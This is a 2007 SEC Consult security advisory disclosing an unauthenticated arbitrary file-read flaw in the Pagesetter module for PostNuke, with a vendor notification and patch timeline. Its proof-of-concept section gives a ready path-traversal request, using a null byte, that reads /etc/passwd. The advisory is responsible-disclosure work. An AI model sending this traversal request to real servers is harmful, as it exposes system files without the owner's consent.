SA-20070226-0.txt

`SEC Consult Security Advisory 20070226-0  
=======================================================================  
title: File Disclosure in Pagesetter for PostNuke  
program: Pagesetter page creation module  
vulnerable version: 6.2.0  
6.3.0 beta 5  
impact: high  
homepage: http://www.elfisk.dk  
found: 2006-11-21  
by: D. Matscheko / SEC-CONSULT /  
www.sec-consult.com  
=======================================================================  
  
vendor description:  
---------------  
  
Pagesetter is a publishing module that allows the PostNuke users to  
create web pages from structured data, with the data structure and  
output templates defined by the PostNuke administrator.  
  
[Source: http://www.elfisk.dk]  
  
  
vulnerability overview:  
---------------  
  
The 3rd party module Pagesetter - up to its latest version (6.3.0  
beta 5) - for PostNuke allows to read arbitrary files. An attacker  
does not need to be logged in but has to know the filename.  
  
  
proof of concept:  
---------------  
  
Here is a sample request that reads the file '/etc/passwd':  
  
$ GET  
'http://example.com/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00'  
  
  
vulnerable versions:  
---------------  
  
Version 6.2.0 as well as 6.3.0 beta 5 are vulnerable to the  
described attack. No older versions were tested.  
  
  
vendor status:  
---------------  
vendor notified: 2007-02-08  
vendor response: 2007-02-08  
patch available: 2007-02-08  
coordinated disclosure: 2007-02-26  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Unternehmensberatung GmbH  
  
Office Vienna  
Blindengasse 3  
A-1080 Wien  
Austria  
  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
www.sec-consult.com  
  
EOF David Matscheko / @2007  
  
  
  
`